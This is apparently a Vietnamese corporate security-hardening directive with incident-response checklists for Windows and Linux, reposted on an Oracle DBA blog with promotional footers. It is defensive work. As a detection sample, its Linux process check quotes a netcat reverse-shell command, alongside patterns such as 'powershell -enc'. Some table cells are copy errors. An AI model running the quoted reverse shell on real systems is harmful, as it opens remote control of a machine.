Đối với các hệ thống được giao, đặc biệt ưu tiên các hệ thống TRỌNG YẾU, các hệ thống có NGUY CƠ cao các đơn vị cần thực hiện cho từng hệ thống cụ thể:
- Triển khai khẩn cấp các giải pháp sao lưu/ phục hồi (backup/restore), đảm bảo hệ thống phải có bản sao lưu toàn phần (backup full) thành công, được lưu trữ tách biệt với hệ thống được backup, nơi lưu trữ phải đảm bảo an toàn, có giới hạn truy cập, giới hạn quyền tác động vào dữ liệu backup.
- Trong trường hợp không đủ tài nguyên, đơn vị chủ động sử dụng nguồn chi phí để triển khai các giải pháp backup offline (đảm bảo có bản backup dữ liệu offline cho các hệ thống trọng yếu do đơn vị quản lý). Tuân thủ theo các quy định của Doanh nghiệp.
- Rà soát, xây dựng ngay kịch bản phục hồi (restore) từ dữ liệu backup để đảm sẵn sàng sử dụng cho kịch bản bị tấn công, phải khôi phục hệ thống.
- Triển khai các biện pháp Gia cố hệ thống theo Phụ lục I.
- Triển khai các biện pháp rà soát, phát hiện loại bỏ Malware, Keyloger trên các máy tính của Đội ngũ Quản trị/ Nhân viên kỹ thuật theo phụ lục II.
Phụ lục I
CÁC BIỆN PHÁP GIA CỐ HỆ THỐNG
- Thực hiện rà soát gia cố LỚP TRUY CẬP, TÀI KHOẢN đảm bảo các yêu cầu sau:
* *Thực hiện đổi mật khẩu các tài
khoản quản trị, đảm bảo mật khẩu khác nhau giữa các hệ thống, TRÁNH dùng chung
1 mật khẩu, KHÔNG sử dụng chung 1 quy luật sinh mật khẩu.
* Thực hiện cấu hình xác thực 2
yếu tố (2FA) đối với các tài khoản quản trị
* Triển khai các kết nối quản trị
qua hệ thống giám sát tài khoản đặc quyền SCB/CYBER ARK, sử dụng VDI/JumStart
server để kết nối vào hệ thống máy chủ.
* *Nghiêm cấm các kết nối quản
trị trực tiếp từ máy tính người dùng đến thẳng máy chủ.
- Thực hiện rà soát gia cố lớp ỨNG DỤNG/WEB/MIDDLEWARE
* *Kiểm tra các ứng dụng/service
web không sử dụng, thực hiện shutdown, stop các service/web mặc định không
dùng.
* *Kiểm tra các tài khoản mặc
định khi cài đặt ứng dụng, thực hiện đổi mật khẩu sang mật khẩu mạnh. Thực hiện
disable/ vô hiệu hoá các tài khoản không dùng. Đặc biệt các tài khoản quản trị
website/webserver.
* *Rà soát file tham số, Cấu hình
loại bỏ các giao thức cũ, có nhiều lỗ hổng bảo mật đã không được sử dụng:
SSL/TLS
* Tuỳ theo phiên bản web server
của đơn vị (nginx, apache, tomcat, IIS …) thực hiện các giải pháp gia cố web
tương ứng (HARDENING WEBSEVER)
* Rà soát các CVE nguy cơ cao trở
lên, các CVE đã có tool khai thai thác để kịp thời cập nhật bản vá nhằm khắc
phục hoặc đề xuất tạm thời cách ly, không khai thác, hoặc khai thác hạn chế.
- Thực hiện rà soát gia cố lớp DATABASE
* *Thực hiện đổi mật khẩu các tài
khoản quản trị có quyền DBA/SYS/BACKUP
* *Disable/ Vô hiệu hoá các tài
khoản mặc định ko sử dụng có kèm theo hệ thống của hãng cung cấp.
* *Triển khai giới hạn IP truy
cập đối với các tài khoản quản trị có quyền DBA/SYS/BACKUP
* Rà soát các nhóm quyền
DBA/Role/Privilege có quyền cập nhật dữ liệu/ truy vấn dữ liệu hàng hoạt (any
table,...), các user có quyền thực thi các package/procedure/function để kịp thời phát hiện và điều chỉnh giới hạn
phân quyền.
- Thực hiện rà soát gia cố lớp MẠNG/FIREWALL/VPN
* *Thực hiện đổi mật khẩu quản
trị các thiết bị mạng, Firewall, Router, Core Switch, VPN.
* *Thực hiện disable/ vô hiệu các
tài khoản mặc định kèm theo thiết bị mà không sử dụng.
* Lên kế hoạch và áp dụng 2FA cho
các tài khoản quản trị.
* Phân hoạch lớp mạng quản trị
riêng cho các kết nối quản trị (Console/OAM) theo từng loại thiết bị/ theo vùng
thiết bị để hạn chế việc truy cập từ bên ngoài và hạn chế vùng nguy cơ.
* Triển khai các máy chủ JumStart
cho các loại kết nối quản trị. Giới hạn việc truy cập quản trị chỉ được kết nối
từ các máy chủ JumStart hoặc thiết bị tin cậy, dành riêng.
* *Rà soát các Rules trên
Firewall/VPN server để giới hạn các kết nối vào phân vùng hệ thống, hạn chế các
rules mở any/any; mở toàn dải mạng,..
- Thực hiện gia cố lớp OS (Hệ điều hành)
* *Triển khai giới hạn truy cập
IP được sử dụng giao thức SSH để truy cập vào hệ thống.
* *Loại bỏ các port/service ko sử
dụng (Telnet/ Web server/FTP/DNS, X-Forwarding...)
* *Bật tính năng chống BruteForce password,
quá 5 lần sai sẽ hạn chế tài khoản và cảnh báo
* Triển khai bật log truy cập, gửi log cảnh
báo khi user root/user có quyền quản trị login thành công.
* Thực hiện giới hạn user root/ user quản
trị truy cập SSH trực tiếp. Yêu cầu dùng user thường khi kết nối và tăng quyền
lên root.
* Triển khai áp dụng 2FA nếu HĐH đáp ứng.
* *Rà soát các nhóm quyền
root/administrator để rà soát loại bỏ các user có quyền root/ quyền admin hệ
thống.
Chú thích:
Các công việc có
nhiều (*) là việc ưu tiên cần thực hiện
trước
Phụ lục III
CÁC BIỆN PHÁP RÀ SOÁT, PHÁT HIỆN LOẠI BỎ MALWARE, KEYLOGER TRÊN CÁC MÁY TÍNH CỦA ĐỘI NGŨ QUẢN TRỊ/ NHÂN VIÊN KỸ THUẬT
1. Check list kiểm tra cho máy windows (PC, Jump, Server)
Các bước thực hiện:
B1: Vào thư mục %SystemRoot%\System32\Winevt\Logs tiến hành copy toàn bộ logs về máy tính của mình.
B2: Tiến hành kiểm tra Service, Process, File trên máy chủ cần kiểm tra.
B3: Sau khi hoàn thành B2, tiến hành quay lại kiểm tra logs đã copy.
No | Step | Tools | Signature |
Kiểm tra windows event logs (Event Viewer) |
1 | Kiểm tra logs về service | Windows Logs -> System: EventID 7045 | Nếu thấy các service lạ VD: Tên ngẫu nhiên, có các param hay commandline chạy câu lệnh, …. Đặc biệt có các service psexec.. Thông báo |
2 | Kiểm tra logs về xóa logs | Windows Logs -> System: EventID 104 Windows Logs -> Security: EventID 1102 | Nếu phát hiện thấy bất kỳ máy tính nào có 2 loại logs trên phải thông báo lại ngay |
3 | Kiểm tra logs về stop Service Event log | Windows Logs -> Application and Service Logs -> Microsoft -> Winlogon: EventID 6006 | Nếu phát hiện có log EventID 6006 cần thông báo lại ngay |
4 | Kiểm tra logs về Process | Windows Logs -> Security: EventID 4688 | Nếu phát hiện các process chạy với commandline bất thương thông báo lại ngay |
5 | Kiểm tra logs về powershell | Windows Logs -> Application and Service Logs -> Windows Powershell :800, 600 Windows Logs -> Application and Service Logs -> Microsoft -> Windows -> Powershell: 410x | Tìm kiếm các command line powershell nghi vấn: powershell -enc …. |
6 | Kiểm tra log về Registry | Windows Logs -> Security: EventID 4657 | Một số Registry cần chú ý a. Changes to AppInit_Dlls - reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_Dlls b. Changes to Services Keys - reg query "HKLM\System\CurrentControlSet\Services" c. Changes to Machine Run Key - reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run” d. Changes to Machine RunOnce Key - reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce” e. Changes to User Run Key - reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run” f. Changes to User RunOnce Key - reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce” |
7 | Kiểm tra logs về thay đổi file trong hệ thống (File Integrity Monitoring) | Windows Logs -> Security: EventID 4663 | Kiểm tra các thay đổi file, về create, delete file, chú ý tên file và thời gian thay đổi file, confirm lại với quản trị viên chịu trách nhiệm |
8 | Kiểm tra về logs net share | Windows Logs -> Security: EventID 5140/5145 | Kiểm tra các lịch sử share resource, note lại và confirm và quản trị viên chịu trách nhiệm |
9 | Kiểm tra logs về WMI | Windows Logs -> Security: EventID 5861 | Kiểm tra các log connect của WMI từ máy khác, note lại các kết nối và confirm lại với quản trị viên chịu trách nhiệm |
10 | Kiểm tra logs về taskschedule | Windows Logs -> Application and Service Logs -> Windows ->Microsoft -> TaskScheduler ( Chú ý eventid 106 tạo taskscheduler) | Kiểm tra lại các taskscheduler, nếu thấy các taskschedule lạ được khởi tạo và xóa thì báo lại cho quản trị viên để confirm. Các schedule nằm trong thư mục %WINDIR%Tasks, %WINDIR%System32\Tasks xuất hiện các tệp tin At1.job,..... |
11 | Kiểm tra các logs liên quan đến sử dụng thực thi SeTcbPrivilege | Windows Logs -> Security: EventID 4703 | Kiểm tra process thwujc thi, người thực thi và thông bào và confirm lại |
12 | Kiểm tra logs liên quan đến đang nhập | Windows Logs -> Security: EventID 4624 | Kiểm tra và thống kê logs đăng nhập trên hệ thống, và gửi lại quản trị viên để confirm các lịch sử đăng nhập này xác nhận truy cập. Chú ý các logon type 3 là Network Logon, type 5 là Service Logon, type 10 là RDP Logon. |
13 | Kiểm tra tấn công bruteforce | Windows Logs -> Security: EventID 4625 | Kiểm tra và thống kê nếu số lượng tần suất logs login fail(4625) nhiều (>10) thì thông báo lại xác định nguồn truy cập |
14 | Kiểm tra logs liên quan đến thay đổi user | Windows Logs -> Security: EventID 4738/4726 | |
15 | Kiểm tra logs liên quan đến thay đổi groups | Windows Logs -> Security: EventID 4727/4734 | |
16 | Kiểm tra logs truy cập đến AD Object hoặc SAM (Security Account Manager) Object | Windows Logs -> Security: EventID 4661 | Kiểm tra yêu cầu truy cập đến AD hoặc SAM Object. Nếu có log EventID 4661 cần thông báo lại ngay. |
17 | Kiểm tra logs thay đổi thời gian hệ thống | Windows Logs -> Security: EventID 4616 | Kiểm tra logs về thay đổi thời gian hệ thống. Nếu có log EventID 4616 cần thông báo lại ngay. |
Kiểm tra máy bằng bộ công cụ SysinternalSuite & ProcessHacker |
1 | Kiểm tra malware, rootkit | TDSSKiller | |
2 | Kiểm tra các service chạy trên hệ thống | Manual
Hoặc chạy command line: – sc.exe query state= all | Mở Run(Windows + R) -> services.msc Kiểm tra tất cả các service đang chạy nếu có service nào tên khả nghi hay có các param chạy lạ note lại và thông báo service run PSEXESVC.EXE |
3 | Kiểm tra các process đang chạy trên máy tính | Process Hacker & procexp64 | Đối với procexp64: Chọn Options-> Verify Signature và check with virustotal Chọn "View Dlls"
Kiểm tra signature và dùng check virustotal Đặc biệt tập trung vào các process và sub-process là cmd hoặc powershell
Nếu thấy các process và sub-process là cmd hoặc powershell cần xem các command line được execute
xem có process tên là scrcons.exe Đối với process hacker: Cũng như procexp64 tuy nhiên thực hiện kiểm tra inject memory bằng cách kiểm chuột phải vào các process đang chạy chọn tab "memory" kiểm tra xem tab "protection" xem có loại nào là "RWX" không nếu có click dup vào kiểm tra phía string có dòng nào "Program ...." |
4 | Check Autorun | Autoruns | Đối với Autoruns Chọn Options-> Verify Signature và check with virustotal kiểm tra các file process dll không có signature hoặc bị virustotal phát hiện
Check các registry đang có trong hệ thống.
check các driver các signature của từng driver và các tab khác trong autorun đều vậy à check cả phần wmi để xem có wmi backdoor Trong tab Schedule task kiểm tra các schedule lạ, nghi vấn |
5 | Kiểm tra Task Schedule | Task Schedule | Kiểm tra toàn bộ task schedule đang có |
6 | Kiểm tra connetion | TCPView | Mở TCPView kiểm tra các kết nối của máy chủ, cần verify lại các ip và port connect ra phía ngoài hoặc ra trong nội bộ |
7 | Kiểm tra User và Group | Manual | Kiểm tra và check lại với đội ngũ quản trị với các User và group đang có (Tập trung vào các user trong group administrator) |
8 | Kiểm tra các file được chia sẻ trên máy | Command line: net view \\127.0.0.1 net session net use | Kiểm tra các lịch sử share resource, note lại và confirm và quản trị viên chịu trách nhiệm |
9 | Kiểm tra các ứng dụng đang được cài đặt trên máy | Manual | Control Pannel -> Programs and Features Kiểm tra các ứng dụng được cài đặt và confirm lại với quản trị viên với một số ứng dụng la, hay cho phép remote truy cập. Powershell: Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize |
10 | Rà soát tunnel | + netsh interface portproxy show all + Nếu có tunnel: export registry dạng text: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy
+Kiểm tra: HKEY_CURRENT_USER\Software\SimonTatham\PuTTY HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys +RDP tunneling: Check log %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx (eventID 21 và 25). Check log: %systemroot%\Windows\System32\winevt\Logs\Security.evtx, event 4624 - logon type = 10. Kiểm tra tồn tại file plink.exe (chú ý có thể với filename khác) | |
11 | Kiểm tra các malware & webshell được cài trong máy | Manual Sử dụng công cụ sigcheck trong bộ SysInternal | Thực hiện kiểm tra các thư mục C:\Windows C:\Windows\Temp C:\Windows\System32 Downloads, Documents, User/AppData, ...
Sử dụng sigcheck để kiểm tra các file chưa được ký trong các thư mục: https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck. Ví dụ: kiểm tra các file executable không được ký trong thư mục C:\Windows\System32: sigcheck -u -e c:\windows\system32
Tích vào "Shown hidden files and folders" để hiển thị file bị ẩn. Kiểm tra modified file: https://www.windows-commandline.com/find-files-based-on-modified-time/ -Find files modified in the last 7 days: forfiles /P directory /S /D +(today'date - 30 days) -Find files that were last modified 1 month back: forfiles /P directory /S /D -30
Dấu hiện nhận biết ở đây là các file nghi vấn VD: DUMP, tên ngẫu nhiên, ...
Để tăng tốc độ, dùng sort date modified để sort theo các file mới nhất. Lưu ý các trường Date modified, Date created và Owner của file.
Việc checkwebshell cũng tương tự cần xác định thư mục chứa web và kiểm tra các file trong đó theo trình tự thời gian |
12 | Kiểm tra named pipe | Sử dụng công cụ Process Explorer,PipeList và Accesschk (Cùng trong SysInternal) | với Accesschk64.exe sử dụng command Acesschk64.exe \pipe\ với quyền Administrator . Nếu tìm thấy pipe lạ chứa các chuỗi ngẫu nhiên . Bật options "Find handle and dll" trong procexp để kiểm tra xem tiến trình nào sử dung pipename |
Kiểm tra thêm bằng các file trên windows |
1 | Export registry để thực hiện phân tích thêm | Sử dụng "Registry Editor", chuột phải chọn "Computer" và click vào "Export" | Kiểm tra các entry nghi ngờ trong "Software\". Ví dụ: Software\Sysinternals\PsExec. |
2 | Copy file "C:\Windows\appcompat\Programs\Amcache.hve" để phân tích thêm | | Amcache.hve file là registry file lưu trữ thông tin các chương trình được thực thi trên máy, bao gồm đường dẫn file thực thi, thời điểm thực thi ban đầu, thời điểm xóa file, lần cài đặt đầu tiên của chương trình. Công cụ đọc file "AmcacheParser" tại https://ericzimmerman.github.io/#!index.md |
3 | Copy Prefetch folder từ đường dẫn "%SystemRoot%\Prefetch" | | Prefetch files bao gồm nhiều metadata, như: tên file thực thi, số lần chạy, thông tin volume, tệp tin và thư mục liên quan, thời gian chạy. Sử dụng công cụ "PECmd", ... |
4 | Copy file lịch sử lệnh chạy powershel tại đường dẫn "C:\Users\Username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" | | Đọc thư mục để kiểm tra các lệnh nghi ngờ đã chạy trên powershell |
*Note: Khi sử dụng các công cụ, phải chạy bằng "Run as Administrator"
Tham khảo trang wiki mục "Windows intrusion analysis" Sẽ được đi kèm với bản checklist này để thực hiện các công cụ
2. Check list kiểm tra cho máy Linux (Server)
No | Step | Command line | Signature |
Kiểm tra máy bằng bộ công cụ SysinternalSuite & ProcessHacker |
1 | Kiểm tra các process đang chạy trên máy tính | Sử dụng lệnh ps -aux hoặc ps -e | đối với process trong Linux mọi người có thể nhìn rõ ràng các command line một số process đang chạy, chú ý các commandline khả nghi để tạo connect VD: nc -e /bin/bash 192.168.1.1 8888
và một số process tên nghi vấn hoặc nằm thư mục khác /opt/ /tmp /usr/mail |
2 | Check service | Tìm kiếm trong thư mục: /etc/systemd/system
/usr/lib/systemd/system
/lib/systemd/system
hoặc dùng câu lệnh
chkconfig --list | Đối với Autoruns Chọn Options-> Verify Signature và check with virustotal kiểm tra các file process dll không có signature hoặc bị virustotal phát hiện
Trong tab Schedule task kiểm tra các schedule lạ, nghi vấn |
3 | Kiểm tra Task Schedule | crontab -l hoặc tìm trong các thư mục: /etc/cron.da ly /etc/cron.weekly /etc/cron.daily | Kiểm tra toàn bộ crontab đang có |
5 | Kiểm tra connetion | netstat -an hoặc netstat -N hoặc lsof -i | Kiểm tra các kết nối của máy chủ, cần verify lại các ip và port connect ra phía ngoài hoặc ra trong nội bộ |
6 | Kiểm tra User và Group | cat /etc/passwd cat /etc/group cat /etc/shadow | Kiểm tra thông tin trong tệp /etc/passwd /etc/group /etc/shadow |
6 | Kiểm tra các malware & file nghi lạ nghi vấn | find / -user root -perm -4000 -print 2>/dev/null find / -uid 0 find / -size +1G (Tìm các file có nội dung lớn 1Gb) |
Dấu hiện nhận biết ở đây là các file nghi vấn VD: DUMP, tên ngẫu nhiên,
|
7 | Kiểm tra các file bị hủy | lsof +L1 | Dấu hiện nhận biết ở đây là các file nghi vấn VD: DUMP, tên ngẫu nhiên, |
8 | Kiểm tra rootkit | chkrootkit | Sử dụng chkrootkit check rootkit trên hệ thống |
8 | Kiểm tra thông tin log | /var/log/message: Thông báo chung và nội dung liên quan đến hệ thống /var/log/auth.log: Log chứa thông tin xác thực /var/log/kern.log: Log chứa thông tin hoạt động của nhân Linux /var/log/cron.log: Log chứa thông tin công việc định kỳ /var/log/maillog: Log chứa thông tin máy chủ mail /var/log/httpd/: Log chứa thông tin truy cập và lỗi của Apache /var/log/boot.log: Log chứa thông tin khởi động hệ thống /var/log/mysqld.log: Log chứa thông tin máy chủ cơ sở dữ liệu MySQL /var/log/secure: Log chứa thông tin xác thực /var/log/utmp or /var/log/wtmp: Tệp ghi thông tin đăng nhập |
|
3. Check list cho client (PC, Jump)
No | Step | Osquery command | Signature |
Kiểm tra windows event logs (Event Viewer) |
1 | Kiểm tra logs về service | check services Check services installed | Nếu thấy các service lạ VD: Tên ngẫu nhiên, có các param hay commandline chạy câu lệnh, …. Đặc biệt có các service psexec.. Thông báo |
2 | Kiểm tra logs về xóa logs | Check clear logs | Nếu phát hiện thấy bất kỳ máy tính nào có 2 loại logs trên phải thông báo lại ngay |
3 | Kiểm tra logs về Process | Check Process connection | Nếu phát hiện các process chạy với commandline bất thương thông báo lại ngay |
4 | Kiểm tra logs về powershell | Check powershell | Tìm kiếm các command line powershell nghi vấn: powershell -enc …. |
Kiểm tra máy bằng bộ công cụ SysinternalSuite & ProcessHacker |
1 | Kiểm tra các process đang chạy trên máy tính | Check Process connection | Đối với procexp64: Chọn Options-> Verify Signature và check with virustotal Chọn "View Dlls"
Kiểm tra signature và dùng check virustotal Đặc biệt tập trung vào các process và sub-process là cmd hoặc powershell
Nếu thấy các process và sub-process là cmd hoặc powershell cần xem các command line được execute
Đối với process hacker: Cũng như procexp64 tuy nhiên thực hiện kiểm tra inject memory bằng cách kiểm chuột phải vào các process đang chạy chọn tab "memory" kiểm tra xem tab "protection" xem có loại nào là "RWX" không nếu có click dup vào kiểm tra phía string có dòng nào "Program ...." |
2 | Check Autorun | check autorun | chiều |
3 | Kiểm tra Task Schedule | Check Task Schedule | Kiểm tra toàn bộ task schedule đang có |
4 | Kiểm tra connetion | Check Process connection | Mở TCPView kiểm tra các kết nối của máy chủ, cần verify lại các ip và port connect ra phía ngoài hoặc ra trong nội bộ |
5 | Kiểm tra User và Group | List Groups List Users | Kiểm tra và check lại với đội ngũ quản trị với các User và group đang có (Tập trung vào các user trong group administrator) |
6 | Kiểm tra ứng dụng đang cài trên máy | Check programs | Kiểm tra và check lại với đội ngũ quản trị với các User và group đang có (Tập trung vào các user trong group administrator) |
7 | Kiểm tra các file được chia sẻ trên máy | Check Share resources | |
=============================
Website không bao giờ chứa bất kỳ quảng cáo nào, mọi đóng góp để duy trì phát triển cho website (donation) xin vui lòng gửi về STK 90.2142.8888 - Ngân hàng Vietcombank Thăng Long - TRAN VAN BINH
=============================
Nếu bạn muốn tiết kiệm 3-5 NĂM trên con đường trở thành DBA chuyên nghiệp thì hãy đăng ký ngay KHOÁ HỌC ORACLE DATABASE A-Z ENTERPRISE, được Coaching trực tiếp từ tôi với toàn bộ kinh nghiệm, thủ tục, quy trình, bí kíp thực chiến mà bạn sẽ KHÔNG THỂ tìm kiếm trên Internet/Google giúp bạn dễ dàng quản trị mọi hệ thống Core tại Việt Nam và trên thế giới, đỗ OCP.
- CÁCH ĐĂNG KÝ: Gõ (.) hoặc để lại số điện thoại hoặc inbox
https://m.me/tranvanbinh.vn hoặc Hotline/Zalo 090.29.12.888
- Chi tiết tham khảo:
https://bit.ly/oaz_w
=============================
2 khóa học online qua video giúp bạn nhanh chóng có những kiến thức nền tảng về Linux, Oracle, học mọi nơi, chỉ cần có Internet/4G:
- Oracle cơ bản:
https://bit.ly/admin1_1200
- Linux:
https://bit.ly/linux_1200
=============================
KẾT NỐI VỚI CHUYÊN GIA TRẦN VĂN BÌNH:
📧 Mail: binhoracle@gmail.com
☎️ Mobile/Zalo: 0902912888
👨 Facebook:
https://www.facebook.com/BinhOracleMaster
👨 Inbox Messenger:
https://m.me/101036604657441 (profile)
👨 Fanpage:
https://www.facebook.com/tranvanbinh.vn
👨 Inbox Fanpage:
https://m.me/tranvanbinh.vn
👨👩 Group FB:
https://www.facebook.com/groups/DBAVietNam
👨 Website:
https://www.tranvanbinh.vn
👨 Blogger:
https://tranvanbinhmaster.blogspot.com
🎬 Youtube:
https://www.youtube.com/@binhguru
👨 Tiktok:
https://www.tiktok.com/@binhguru
👨 Linkin:
https://www.linkedin.com/in/binhoracle
👨 Twitter:
https://twitter.com/binhguru
👨 Podcast:
https://www.podbean.com/pu/pbblog-eskre-5f82d6
👨 Địa chỉ: Tòa nhà Sun Square - 21 Lê Đức Thọ - Phường Mỹ Đình 1 - Quận Nam Từ Liêm - TP.Hà Nội
=============================
oracle tutorial, học oracle database, Tự học Oracle, Tài liệu Oracle 12c tiếng Việt, Hướng dẫn sử dụng Oracle Database, Oracle SQL cơ bản, Oracle SQL là gì, Khóa học Oracle Hà Nội, Học chứng chỉ Oracle ở đầu, Khóa học Oracle online,sql tutorial, khóa học pl/sql tutorial, học dba, học dba ở việt nam, khóa học dba, khóa học dba sql, tài liệu học dba oracle, Khóa học Oracle online, học oracle sql, học oracle ở đâu tphcm, học oracle bắt đầu từ đâu, học oracle ở hà nội, oracle database tutorial, oracle database 12c, oracle database là gì, oracle database 11g, oracle download, oracle database 19c, oracle dba tutorial, oracle tunning, sql tunning , oracle 12c, oracle multitenant, Container Databases (CDB), Pluggable Databases (PDB), oracle cloud, oracle security, oracle fga, audit_trail,oracle RAC, ASM, oracle dataguard, oracle goldengate, mview, oracle exadata, oracle oca, oracle ocp, oracle ocm , oracle weblogic, postgresql tutorial, mysql tutorial, mariadb tutorial, ms sql server tutorial, nosql, mongodb tutorial, oci, cloud, middleware tutorial, hoc solaris tutorial, hoc linux tutorial, hoc aix tutorial, unix tutorial, securecrt, xshell, mobaxterm, putty